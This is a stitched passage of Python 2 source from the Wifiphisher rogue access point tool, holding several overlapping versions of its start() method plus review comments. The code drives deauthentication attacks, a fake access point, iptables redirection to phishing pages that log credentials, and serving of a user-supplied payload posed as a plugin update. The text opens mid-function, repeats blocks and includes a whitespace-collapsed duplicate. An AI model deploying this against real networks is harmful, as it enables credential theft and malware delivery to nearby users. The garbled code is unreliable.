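            'rogue_ap_mac': rogue_ap_mac,
            'APs': APs_context,
            'args': args
        }
        self.network_manager.up_interface(mon_iface)
        self.em.set_interface(mon_iface)
        # Work on a copy so the module-level default list is never mutated.
        extensions = list(DEFAULT_EXTENSIONS)
        if args.lure10_exploit:
            extensions.append(LURE10_EXTENSION)
        if args.handshake_capture:
            extensions.append(HANDSHAKE_VALIDATE_EXTENSION)
        if args.nodeauth:
            extensions.remove(DEAUTH_EXTENSION)
        if args.wpspbc_exploit:
            extensions.append(WPSPBC)
        self.em.set_extensions(extensions)
        self.em.init_extensions(shared_data)
        self.em.start_extensions()
    # With configured DHCP, we may now start the web server
    if not self.opmode.internet_sharing_enabled():
        # Start HTTP server in a background (daemon) thread so it dies
        # with the main thread.
        print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
            PORT) + ", " + str(SSL_PORT)
        webserver = Thread(target=phishinghttp.runHTTPServer,
                           args=(NETWORK_GW_IP, PORT, SSL_PORT, template,
                                 self.em))
        webserver.daemon = True
        webserver.start()
        time.sleep(1.5)
    # We no longer need mac_matcher
    self.mac_matcher.unbind()
    APs = []
    # Main loop.
    try:
        main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em,
                                 phishinghttp, args)
        tui_main_object = tui.TuiMain()
        curses.wrapper(tui_main_object.gather_info, main_info)
        self.stop()
    except KeyboardInterrupt:
        self.stop()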
def start(self):
    """Run one Wifiphisher session from argument parsing to the main TUI loop.

    Everything here is an ordered side effect: parse CLI args and set up
    logging; refuse to continue unless the effective uid is 0; choose the
    monitor / AP / internet interfaces through self.network_manager (optionally
    rewriting their MACs and putting the monitor one into "monitor" mode);
    kill interfering processes and install firewall rules; take the target
    ESSID / channel from --essid or from the curses AP picker; select and
    populate the phishing template; bring up the access point with DHCP/DNS;
    start the extension manager and the HTTP(S) server thread; then block in
    the curses main screen until it returns or KeyboardInterrupt is raised,
    after which self.stop() is called.

    Returns nothing. Failure paths call sys.exit() or self.stop(); whether
    stop() returns or terminates the process is defined elsewhere in the file.
    """
    today = time.strftime("%Y-%m-%d %H:%M")
    print ('[' + T + '*' + W + '] Starting Wifiphisher %s ( %s ) at %s' %
           (VERSION, WEBSITE, today))
    # Show some emotions.
    if BIRTHDAY in today:
        print '[' + T + '*' + W + \
            '] Wifiphisher was first released on this day in 2015! ' \
            'Happy birthday!'
    if NEW_YEAR in today:
        print '[' + T + '*' + W + \
            '] Happy new year!'
    # First of - are you root?
    # Everything after this point runs with root privileges (interface
    # reconfiguration, firewall rules, process killing, file copies).
    if os.geteuid():
        logger.error("Non root user detected")
        sys.exit('[' + R + '-' + W + '] Please run as root')
    # Set the channel range
    set_channel_range()
    # Parse args
    # Both names are module globals: `args` is rebound here and `APs` is
    # read (and reset) near the end of this method.
    global args, APs
    args = parse_args()
    # setup the logging configuration
    setup_logging(args)
    if args.phishing_pages_directory:
        # check if the path ends with the proper separator, if not add it
        # this is to prevent problems when joining path with string concatenation
        if args.phishing_pages_directory[-1] != os.path.sep:
            args.phishing_pages_directory += os.path.sep
        phishing_pages_dir = args.phishing_pages_directory
        logger.info("Searching for scenario in %s" % phishing_pages_dir)
    if args.dnsmasq_conf:
        self.access_point.dns_conf_path = args.dnsmasq_conf
    if args.credential_log_path:
        # Taken verbatim from the CLI and handed to the HTTP module; no
        # normalisation or existence check happens here, and the process is root.
        phishinghttp.credential_log_path = args.credential_log_path
    # Initialize the operation mode manager
    self.opmode.initialize(args)
    # Set operation mode
    self.opmode.set_opmode(args, self.network_manager)
    self.network_manager.start()
    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere
    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        if self.opmode.internet_sharing_enabled():
            self.network_manager.internet_access_enable = True
            if self.network_manager.is_interface_valid(
                    args.internetinterface, "internet"):
                internet_interface = args.internetinterface
                if interfaces.is_wireless_interface(internet_interface):
                    self.network_manager.unblock_interface(
                        internet_interface)
            logger.info("Selecting %s interface for accessing internet",
                        args.internetinterface)
        # check if the interface for WPS is valid
        if self.opmode.assoc_enabled():
            if self.network_manager.is_interface_valid(
                    args.wpspbc_assoc_interface, "WPS"):
                logger.info("Selecting %s interface for WPS association",
                            args.wpspbc_assoc_interface)
        # NOTE(review): mon_iface / ap_iface are only bound inside the
        # branches below. The code relies on is_interface_valid() raising
        # (caught by the except clause) rather than returning False; if it
        # can return False, later uses hit an unbound local — confirm in
        # network_manager.
        if self.opmode.extensions_enabled():
            if args.extensionsinterface and args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.extensionsinterface, "monitor"):
                    mon_iface = args.extensionsinterface
                    self.network_manager.unblock_interface(mon_iface)
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                mon_iface, ap_iface = self.network_manager.get_interface_automatically(
                )
            # display selected interfaces to the user
            logger.info(
                "Selecting {} for deauthentication and {} for the rogue Access Point"
                .format(mon_iface, ap_iface))
            print(
                "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                "rogue Access Point").format(G, W, mon_iface, ap_iface)
        if not self.opmode.extensions_enabled():
            if args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                ap_iface = self.network_manager.get_interface(True, False)
            # Without extensions a single interface plays both roles.
            mon_iface = ap_iface
            print(
                "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                "rogue Access Point").format(G, W, ap_iface)
            logger.info("Selecting {} interface for rogue Access Point"
                        .format(ap_iface))
        # Randomize MAC
        # An InvalidMacAddressError is reported but not fatal: the method
        # carries on with whatever MAC the interface currently has.
        if not args.no_mac_randomization:
            try:
                new_mac = self.network_manager.set_interface_mac(
                    ap_iface, args.mac_ap_interface)
                logger.info("Changing {} MAC address to {}".format(
                    ap_iface, new_mac))
                print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                    G, W, ap_iface, new_mac)
                if mon_iface != ap_iface:
                    new_mac = self.network_manager.set_interface_mac(
                        mon_iface, args.mac_extensions_interface)
                    logger.info("Changing {} MAC address to {}".format(
                        mon_iface, new_mac))
                    # NOTE(review): this message names ap_iface, but the MAC
                    # that was just changed belongs to mon_iface (the logger
                    # line above has it right).
                    print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(
                        G, W, ap_iface, new_mac)
            except interfaces.InvalidMacAddressError as err:
                print("[{0}!{1}] {2}").format(R, W, err)
        # make sure interfaces are not blocked
        logger.info("Unblocking interfaces")
        self.network_manager.unblock_interface(ap_iface)
        self.network_manager.unblock_interface(mon_iface)
        # set monitor mode only when --essid is not given
        if self.opmode.extensions_enabled() or args.essid is None:
            self.network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.InvalidInterfaceError,
            interfaces.InterfaceCantBeFoundError,
            interfaces.InterfaceManagedByNetworkManagerError) as err:
        logging.exception("The following error has occurred:")
        print("[{0}!{1}] {2}").format(R, W, err)
        time.sleep(1)
        self.stop()
    if not args.internetinterface and not args.keepnetworkmanager:
        kill_interfering_procs()
        logger.info("Killing all interfering processes")
    # Firewall setup: NAT through the internet interface, or redirect
    # everything to the local web server.
    if self.opmode.internet_sharing_enabled():
        self.fw.nat(ap_iface, args.internetinterface)
        set_ip_fwd()
    else:
        self.fw.redirect_requests_localhost()
        set_route_localnet()
    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
    time.sleep(1)
    if args.essid:
        essid = args.essid
        channel = str(CHANNEL)
        # We don't have target attacking MAC in frenzy mode
        # That is we deauth all the BSSIDs that being sniffed
        target_ap_mac = None
        enctype = None
    else:
        # let user choose access point
        # start the monitor adapter
        self.network_manager.up_interface(mon_iface)
        ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
                                       self.network_manager, args)
        ap_sel_object = tui.TuiApSel()
        access_point = curses.wrapper(ap_sel_object.gather_info,
                                      ap_info_object)
        # if the user has chosen a access point continue
        # otherwise shutdown
        if access_point:
            # store choosen access point's information
            essid = access_point.name
            channel = access_point.channel
            target_ap_mac = access_point.mac_address
            enctype = access_point.encryption
        else:
            # NOTE(review): if stop() returns instead of exiting, essid /
            # channel / target_ap_mac / enctype are unbound from here on.
            self.stop()
    # create a template manager object
    self.template_manager = phishingpage.TemplateManager(
        data_pages=args.phishing_pages_directory)
    # get the correct template
    tui_template_obj = tui.TuiTemplateSelection()
    template = tui_template_obj.gather_info(args.phishingscenario,
                                            self.template_manager)
    logger.info("Selecting {} template".format(
        template.get_display_name()))
    print("[" + G + "+" + W + "] Selecting " +
          template.get_display_name() + " template")
    # payload selection for browser plugin update
    if template.has_payload():
        payload_path = args.payload_path
        # copy payload to update directory
        while not payload_path or not os.path.isfile(payload_path):
            # get payload path
            payload_path = raw_input(
                "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                "] to the payload you wish to serve: ")
            if not os.path.isfile(payload_path):
                print '[' + R + '-' + W + '] Invalid file path!'
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        template.update_payload_path(os.path.basename(payload_path))
        # Only isfile() was checked above; the destination is built by
        # string concatenation, relying on template_directory ending in a
        # separator.
        copyfile(payload_path,
                 self.template_manager.template_directory +
                 template.get_payload_path())
    # Snapshot of the module-level APs table for the template; the
    # indexing below assumes each entry is (channel, essid, bssid, ...).
    APs_context = []
    for i in APs:
        APs_context.append({
            'channel': APs[i][0] or "",
            'essid': APs[i][1] or "",
            'bssid': APs[i][2] or "",
            'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or ""
        })
    template.merge_context({'APs': APs_context})
    # only get logo path if MAC address is present
    ap_logo_path = False
    if target_ap_mac is not None:
        ap_logo_path = template.use_file(
            self.mac_matcher.get_vendor_logo_path(target_ap_mac))
    template.merge_context({
        'target_ap_channel': channel or "",
        'target_ap_essid': args.phishing_essid or essid or "",
        'target_ap_bssid': target_ap_mac or "",
        'target_ap_encryption': enctype or "",
        'target_ap_vendor': self.mac_matcher.get_vendor_name(target_ap_mac) or "",
        'target_ap_logo_path': ap_logo_path or ""
    })
    # add wps_enable into the template context
    if args.wps_pbc:
        template.merge_context({'wps_pbc_attack': "1"})
    else:
        template.merge_context({'wps_pbc_attack': "0"})
    # We want to set this now for hostapd. Maybe the interface was in "monitor"
    # mode for network discovery before (e.g. when --noextensions is enabled).
    self.network_manager.set_interface_mode(ap_iface, "managed")
    # Start AP
    self.network_manager.up_interface(ap_iface)
    self.access_point.interface = ap_iface
    self.access_point.channel = channel
    self.access_point.essid = essid
    if args.force_hostapd:
        print('[' + T + '*' + W + '] Using hostapd instead of roguehostapd.'
              " Many significant features will be turned off."
              )
        self.access_point.force_hostapd = True
    if args.wpspbc_assoc_interface:
        wps_mac = self.network_manager.get_interface_mac(
            args.wpspbc_assoc_interface)
        self.access_point.deny_mac_addrs.append(wps_mac)
    if args.presharedkey:
        self.access_point.presharedkey = args.presharedkey
    if self.opmode.internet_sharing_enabled():
        self.access_point.internet_interface = args.internetinterface
    print '[' + T + '*' + W + '] Starting the fake access point...'
    try:
        self.access_point.start(disable_karma=args.disable_karma)
        self.access_point.start_dhcp_dns()
    except BaseException:
        # NOTE(review): BaseException also swallows KeyboardInterrupt and
        # SystemExit, and the error itself is neither logged nor re-raised.
        # If stop() returns rather than exiting, execution continues with a
        # half-started access point.
        self.stop()
    # Start Extension Manager (EM)
    # We need to start EM before we boot the web server
    if self.opmode.extensions_enabled():
        shared_data = {
            'is_freq_hop_allowed': self.opmode.freq_hopping_enabled(),
            'target_ap_channel': channel or "",
            'target_ap_essid': essid or "",
            'target_ap_bssid': target_ap_mac or "",
            'target_ap_encryption': enctype or "",
            'target_ap_logo_path': ap_logo_path or "",
            'rogue_ap_essid': essid or "",
            'rogue_ap_mac': self.network_manager.get_interface_mac(ap_iface),
            'roguehostapd': self.access_point.hostapd_object,
            'APs': APs_context,
            'args': args
        }
        self.network_manager.up_interface(mon_iface)
        self.em.set_interface(mon_iface)
        # NOTE(review): no copy is made, so the append()/remove() calls
        # below mutate the module-level DEFAULT_EXTENSIONS list itself.
        # Harmless for one start() per process; a second call would inherit
        # the earlier edits. `extensions = list(DEFAULT_EXTENSIONS)` avoids it.
        extensions = DEFAULT_EXTENSIONS
        if args.lure10_exploit:
            extensions.append(LURE10_EXTENSION)
        if args.handshake_capture:
            extensions.append(HANDSHAKE_VALIDATE_EXTENSION)
        if args.nodeauth:
            # remove() raises ValueError if DEAUTH_EXTENSION is not present;
            # presumably it always is in DEFAULT_EXTENSIONS — verify.
            extensions.remove(DEAUTH_EXTENSION)
        if args.wps_pbc:
            extensions.append(WPSPBC)
        if args.known_beacons:
            extensions.append(KNOWN_BEACONS_EXTENSION)
        if not args.force_hostapd:
            extensions.append(ROGUEHOSTAPDINFO)
        self.em.set_extensions(extensions)
        self.em.init_extensions(shared_data)
        self.em.start_extensions()
    # With configured DHCP, we may now start the web server
    if not self.opmode.internet_sharing_enabled():
        # Start HTTP server in a background thread
        print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(
            PORT) + ", " + str(SSL_PORT)
        webserver = Thread(
            target=phishinghttp.runHTTPServer,
            args=(NETWORK_GW_IP, PORT, SSL_PORT, template, self.em))
        # Daemon thread: the process may exit without joining it.
        webserver.daemon = True
        webserver.start()
        # Fixed delay rather than a readiness check on the listening sockets.
        time.sleep(1.5)
    # We no longer need mac_matcher
    self.mac_matcher.unbind()
    # clients_APs is never read afterwards in this method.
    clients_APs = []
    # Resets the module global declared above.
    APs = []
    # Main loop.
    # Both the normal return of the TUI and Ctrl-C end in stop().
    try:
        main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em,
                                 phishinghttp, args)
        tui_main_object = tui.TuiMain()
        curses.wrapper(tui_main_object.gather_info, main_info)
        self.stop()
    except KeyboardInterrupt:
        self.stop()
'target_ap_essid': essid or "", 'target_ap_bssid': target_ap_mac or "", 'target_ap_encryption': enctype or "", 'target_ap_logo_path': ap_logo_path or "", 'rogue_ap_essid': essid or "", 'rogue_ap_mac': self.network_manager.get_interface_mac(ap_iface), 'roguehostapd': self.access_point.hostapd_object, 'APs': APs_context, 'args': args } self.network_manager.up_interface(mon_iface) self.em.set_interface(mon_iface) extensions = DEFAULT_EXTENSIONS if args.lure10_exploit: extensions.append(LURE10_EXTENSION) if args.handshake_capture: extensions.append(HANDSHAKE_VALIDATE_EXTENSION) if args.nodeauth: extensions.remove(DEAUTH_EXTENSION) if args.wps_pbc: extensions.append(WPSPBC) if args.known_beacons: extensions.append(KNOWN_BEACONS_EXTENSION) if not args.force_hostapd: extensions.append(ROGUEHOSTAPDINFO) self.em.set_extensions(extensions) self.em.init_extensions(shared_data) self.em.start_extensions() # With configured DHCP, we may now start the web server if not self.opmode.internet_sharing_enabled():
def start(self):
    """Run one Wifiphisher session (older variant of this method).

    Ordered side effects: parse and check CLI args; refuse to continue unless
    the effective uid is 0; kill interfering processes when no internet
    interface is given; choose the monitor / AP / internet interfaces through
    self.network_manager (optionally rewriting their MACs and putting the
    monitor one into "monitor" mode); install firewall rules; take the target
    ESSID / channel from --essid or from the curses AP picker; select and
    populate the phishing template; bring up the access point with DHCP/DNS;
    start the HTTP(S) server thread and, unless --nojamming, the extension
    manager; then block in the curses main screen.

    Returns nothing. Failure paths call sys.exit() or self.stop(); whether
    stop() returns or terminates the process is defined elsewhere in the file.
    """
    # Parse args
    # Both names are module globals: `args` is rebound here and `APs` is
    # read (and reset) near the end of this method.
    global args, APs
    args = parse_args()
    # Check args
    check_args(args)
    # Are you root?
    # Everything after this point runs with root privileges.
    if os.geteuid():
        sys.exit('[' + R + '-' + W + '] Please run as root')
    if not args.internetinterface:
        kill_interfering_procs()
    self.network_manager.start()
    # TODO: We should have more checks here:
    # Is anything binded to our HTTP(S) ports?
    # Maybe we should save current iptables rules somewhere
    # get interfaces for monitor mode and AP mode and set the monitor interface
    # to monitor mode. shutdown on any errors
    try:
        if args.internetinterface:
            if self.network_manager.is_interface_valid(
                    args.internetinterface, "internet"):
                internet_interface = args.internetinterface
                self.network_manager.unblock_interface(internet_interface)
        # NOTE(review): mon_iface / ap_iface are only bound inside the
        # branches below; the code relies on is_interface_valid() raising
        # (caught below) rather than returning False — confirm in
        # network_manager.
        if not args.nojamming:
            if args.jamminginterface and args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.jamminginterface, "monitor"):
                    mon_iface = args.jamminginterface
                    self.network_manager.unblock_interface(mon_iface)
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                mon_iface, ap_iface = self.network_manager.get_interface_automatically()
            # display selected interfaces to the user
            print (
                "[{0}+{1}] Selecting {0}{2}{1} interface for the deauthentication "
                "attack\n[{0}+{1}] Selecting {0}{3}{1} interface for creating the "
                "rogue Access Point").format(
                    G, W, mon_iface, ap_iface)
            # randomize the mac addresses
            if not args.no_mac_randomization:
                if args.mac_ap_interface:
                    self.network_manager.set_interface_mac(
                        ap_iface, args.mac_ap_interface)
                else:
                    self.network_manager.set_interface_mac_random(ap_iface)
                if args.mac_deauth_interface:
                    self.network_manager.set_interface_mac(
                        mon_iface, args.mac_deauth_interface)
                else:
                    self.network_manager.set_interface_mac_random(
                        mon_iface)
        else:
            if args.apinterface:
                if self.network_manager.is_interface_valid(
                        args.apinterface, "AP"):
                    ap_iface = args.apinterface
            else:
                ap_iface = self.network_manager.get_interface(True, False)
            # Without jamming a single interface plays both roles.
            mon_iface = ap_iface
            if not args.no_mac_randomization:
                if args.mac_ap_interface:
                    self.network_manager.set_interface_mac(
                        ap_iface, args.mac_ap_interface)
                else:
                    self.network_manager.set_interface_mac_random(ap_iface)
            print (
                "[{0}+{1}] Selecting {0}{2}{1} interface for creating the "
                "rogue Access Point").format(
                    G, W, ap_iface)
            # randomize the mac addresses
            # NOTE(review): this is a second randomisation of ap_iface in
            # the same branch; it discards an explicit args.mac_ap_interface
            # value applied a few lines above (the indentation was lost in
            # this copy, so the exact nesting is reconstructed — verify).
            if not args.no_mac_randomization:
                self.network_manager.set_interface_mac_random(ap_iface)
        # make sure interfaces are not blocked
        self.network_manager.unblock_interface(ap_iface)
        self.network_manager.unblock_interface(mon_iface)
        self.network_manager.set_interface_mode(mon_iface, "monitor")
    except (interfaces.InvalidInterfaceError,
            interfaces.InterfaceCantBeFoundError,
            interfaces.InterfaceManagedByNetworkManagerError) as err:
        print ("[{0}!{1}] {2}").format(R, W, err)
        time.sleep(1)
        self.stop()
    if not args.no_mac_randomization:
        # ap_mac here is the rogue interface's own MAC; the same name is
        # rebound to the *target* AP's MAC further down.
        ap_mac = self.network_manager.get_interface_mac(ap_iface)
        print "[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(G, W, ap_iface, ap_mac)
        if not args.nojamming:
            mon_mac = self.network_manager.get_interface_mac(mon_iface)
            print ("[{0}+{1}] Changing {2} MAC addr (BSSID) to {3}".format(G, W, mon_iface, mon_mac))
    # Firewall setup: NAT through the internet interface, or redirect
    # everything to the local web server.
    if args.internetinterface:
        self.fw.nat(ap_iface, args.internetinterface)
        set_ip_fwd()
    else:
        self.fw.redirect_requests_localhost()
        set_route_localnet()
    print '[' + T + '*' + W + '] Cleared leases, started DHCP, set up iptables'
    time.sleep(1)
    if args.essid:
        essid = args.essid
        channel = str(CHANNEL)
        ap_mac = None
        enctype = None
    else:
        # let user choose access point
        ap_info_object = tui.ApSelInfo(mon_iface, self.mac_matcher,
                                       self.network_manager, args)
        ap_sel_object = tui.TuiApSel()
        access_point = curses.wrapper(ap_sel_object.gather_info,
                                      ap_info_object)
        # if the user has chosen a access point continue
        # otherwise shutdown
        if access_point:
            # store choosen access point's information
            essid = access_point.get_name()
            channel = access_point.get_channel()
            ap_mac = access_point.get_mac_address()
            enctype = access_point.get_encryption()
        else:
            # NOTE(review): if stop() returns instead of exiting, essid /
            # channel / ap_mac / enctype are unbound from here on.
            self.stop()
    # create a template manager object
    self.template_manager = phishingpage.TemplateManager()
    # get the correct template
    tui_template_obj = tui.TuiTemplateSelection()
    template = tui_template_obj.gather_info(args.phishingscenario,
                                            self.template_manager)
    print ("[" + G + "+" + W + "] Selecting " +
           template.get_display_name() + " template")
    # payload selection for browser plugin update
    if template.has_payload():
        payload_path = False
        # copy payload to update directory
        while not payload_path or not os.path.isfile(payload_path):
            # get payload path
            payload_path = raw_input(
                "[" + G + "+" + W + "] Enter the [" + G + "full path" + W +
                "] to the payload you wish to serve: ")
            if not os.path.isfile(payload_path):
                print '[' + R + '-' + W + '] Invalid file path!'
        print '[' + T + '*' + W + '] Using ' + G + payload_path + W + ' as payload '
        # Only isfile() was checked; destination built by string concatenation.
        copyfile(payload_path, PHISHING_PAGES_DIR + template.get_payload_path())
    # Snapshot of the module-level APs table for the template; the
    # indexing below assumes each entry is (channel, essid, bssid, ...).
    APs_context = []
    for i in APs:
        APs_context.append({
            'channel': APs[i][0] or "",
            'essid': APs[i][1] or "",
            'bssid': APs[i][2] or "",
            'vendor': self.mac_matcher.get_vendor_name(APs[i][2]) or ""
        })
    template.merge_context({'APs': APs_context})
    # only get logo path if MAC address is present
    ap_logo_path = False
    if ap_mac:
        ap_logo_path = template.use_file(
            self.mac_matcher.get_vendor_logo_path(ap_mac))
    template.merge_context({
        'target_ap_channel': channel or "",
        'target_ap_essid': essid or "",
        'target_ap_bssid': ap_mac or "",
        'target_ap_encryption': enctype or "",
        'target_ap_vendor': self.mac_matcher.get_vendor_name(ap_mac) or "",
        'target_ap_logo_path': ap_logo_path or ""
    })
    # We want to set this now for hostapd. Maybe the interface was in "monitor"
    # mode for network discovery before (e.g. when --nojamming is enabled).
    self.network_manager.set_interface_mode(ap_iface, "managed")
    # Start AP
    self.access_point.set_interface(ap_iface)
    self.access_point.set_channel(channel)
    self.access_point.set_essid(essid)
    if args.presharedkey:
        self.access_point.set_psk(args.presharedkey)
    if args.internetinterface:
        self.access_point.set_internet_interface(args.internetinterface)
    print '[' + T + '*' + W + '] Starting the fake access point...'
    try:
        self.access_point.start()
        self.access_point.start_dhcp_dns()
    except BaseException:
        # NOTE(review): BaseException also swallows KeyboardInterrupt and
        # SystemExit, and the error is neither logged nor re-raised. If
        # stop() returns rather than exiting, execution continues with a
        # half-started access point.
        self.stop()
    # With configured DHCP, we may now start the web server
    if not args.internetinterface:
        # Start HTTP server in a background thread
        print '[' + T + '*' + W + '] Starting HTTP/HTTPS server at ports ' + str(PORT) + ", " + str(SSL_PORT)
        webserver = Thread(target=phishinghttp.runHTTPServer,
                           args=(NETWORK_GW_IP, PORT, SSL_PORT, template))
        # Daemon thread: the process may exit without joining it.
        webserver.daemon = True
        webserver.start()
        # Fixed delay rather than a readiness check on the listening sockets.
        time.sleep(1.5)
    # We no longer need mac_matcher
    self.mac_matcher.unbind()
    # clients_APs is never read afterwards in this method.
    clients_APs = []
    # Resets the module global declared above.
    APs = []
    if not args.nojamming:
        # Start Extension Manager
        shared_data = {
            'target_ap_channel': channel or "",
            'target_ap_essid': essid or "",
            'target_ap_bssid': ap_mac or "",
            'target_ap_encryption': enctype or "",
            'target_ap_logo_path': ap_logo_path or "",
            # NOTE(review): at this point ap_mac holds the target AP's MAC
            # (or None), not the rogue interface's, so this key is misnamed
            # or wrong; the interface MAC would come from
            # self.network_manager.get_interface_mac(ap_iface).
            'rogue_ap_mac': ap_mac,
            'APs': APs_context,
            'args': args
        }
        self.em.set_interface(mon_iface)
        # NOTE(review): no copy is made, so append() below mutates the
        # module-level DEFAULT_EXTENSIONS list itself;
        # `extensions = list(DEFAULT_EXTENSIONS)` would avoid that.
        extensions = DEFAULT_EXTENSIONS
        if args.lure10_exploit:
            extensions.append(LURE10_EXTENSION)
        self.em.set_extensions(extensions)
        self.em.init_extensions(shared_data)
        self.em.start_extensions()
    # Main loop.
    # Only Ctrl-C reaches stop() here; a normal return from the TUI falls
    # off the end of the method without tearing anything down.
    try:
        main_info = tui.MainInfo(VERSION, essid, channel, ap_iface, self.em,
                                 phishinghttp, args)
        tui_main_object = tui.TuiMain()
        curses.wrapper(tui_main_object.gather_info, main_info)
    except KeyboardInterrupt:
        self.stop()